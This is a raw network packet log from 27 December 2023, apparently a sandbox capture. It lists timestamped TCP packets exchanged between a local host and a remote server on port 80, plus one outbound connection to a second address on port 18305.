Dec 27, 2023 18:12:22.706276894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.706360102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.723375082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.723392963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.723460913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.740555048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.740571976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.740727901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.757608891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.757623911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.757797003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.774621964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.774635077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.774792910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.789300919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.789314032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.789458990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.803814888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.803831100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.803905010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.817586899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.817608118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.817819118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.831319094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.831343889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.831396103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.845191956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.845206976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.845272064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.858689070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.858704090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.858743906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.872474909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.872488976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.872571945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.886204004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.886220932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.886279106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.899905920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.899919987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.899966002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.907987118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.908000946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.908047915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.915993929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.916007996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.916057110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.924041986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.924057961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.924101114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.932106972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.932120085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.932182074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.940151930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.940200090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.940346956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.948214054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.948249102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.948288918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.956274986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.956290007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.956336975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.964380980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.964394093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.964431047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.972383022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.972407103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.972448111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.980536938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.980551004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.980601072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.988480091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.988492012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.988533020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:22.996586084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.996598959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:22.996634960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.004595995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.004610062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.004661083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.012687922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.012701035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.012739897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.020725965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.020739079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.020795107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.029277086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.029292107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.029341936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.036832094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.036848068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.036911011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.044966936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.044982910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.045043945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.052932024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.052947998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.053013086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.061100006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.061115980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.061202049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.067966938 CET	49739	18305	192.168.2.4	195.20.16.103
Dec 27, 2023 18:12:23.069056988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.069073915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.069128990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.076858997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.076874018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.076929092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.084631920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.084657907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.084713936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.092199087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.092212915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.092258930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.099539042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.099553108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.099601984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.107026100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.107038975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.107074022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.114269018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.114283085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.114327908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.122951984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.122966051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.123003006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.128670931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.128684998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.128746033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.135742903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.135756016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.135796070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.142765045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.142818928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.142864943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.149738073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.149750948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.149797916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.155050039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.155066967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.155112982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.160249949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.160264969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.160307884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.165385962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.165400982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.165460110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.170430899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.170444965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.170486927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.175303936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.175318003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.175357103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.180238008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.180249929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.180294037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.185014009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.185026884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.185075045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.189665079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.189677954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.189727068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.194214106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.194227934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.194272995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.198837042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.198849916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.198895931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.203303099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.203316927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.203363895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.207691908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.207707882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.207752943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.212080956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.212094069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.212137938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.216386080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.216398954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.216442108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.220693111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.220761061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.220804930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.225295067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.225307941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.225351095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.228924036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.228960037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.229002953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.233083963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.233102083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.233144999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.237070084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.237083912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.237135887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.241014957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.241028070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.241071939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.244884968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.244899035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.244951010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.249000072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.249063969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.249111891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.252634048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.252646923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.252691984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.256392956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.256406069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.256450891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.260181904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.260195017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.260230064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.263925076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.263962030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.264004946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.267584085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.267596960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.267641068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.271204948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.271219015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.271251917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.274853945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.274909973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.274956942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.278350115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.278362989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.278399944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.281889915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.281915903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.281963110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.285449982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.285461903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.285500050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.288872957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.288886070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.288949013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.292330980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.292344093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.292377949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.295763969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.295797110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.295845032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.299180984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.299194098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.299235106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.302567005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.302599907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.302645922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.305849075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.305861950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.305906057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.309236050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.309248924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.309298992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.312598944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.312613010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.312655926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.316010952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.316024065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.316068888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.319217920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.319231033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.319279909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.322402954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.322417021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.322463036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.325690985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.325705051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.325748920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.328852892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.328870058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.328937054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.331967115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.332007885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.332056046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.335220098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.335237026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.335278988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.338458061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.338478088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.338525057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.342506886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.342521906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.342562914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.344531059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.344546080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.344594002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.347685099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.347702026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.347758055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.350716114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.350730896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.350776911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.353749037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.353766918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.353809118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.356828928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.356844902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.356900930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.359936953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.359951973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.360001087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.362723112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.362780094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.362829924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.365688086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.365701914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.365786076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.368777037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.368792057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.368838072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.371642113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.371656895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.371707916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.374495983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.374511003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.374569893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.377530098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.377547979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.377619028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.380283117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.380295992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.380348921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.383122921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.383138895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.383197069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.386010885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.386023045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.386073112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.388804913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.388818979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.389147043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.391633987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.391649961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.391700983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.394365072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.394378901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.394435883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.397113085 CET	80	49738	5.42.65.125	192.168.2.4
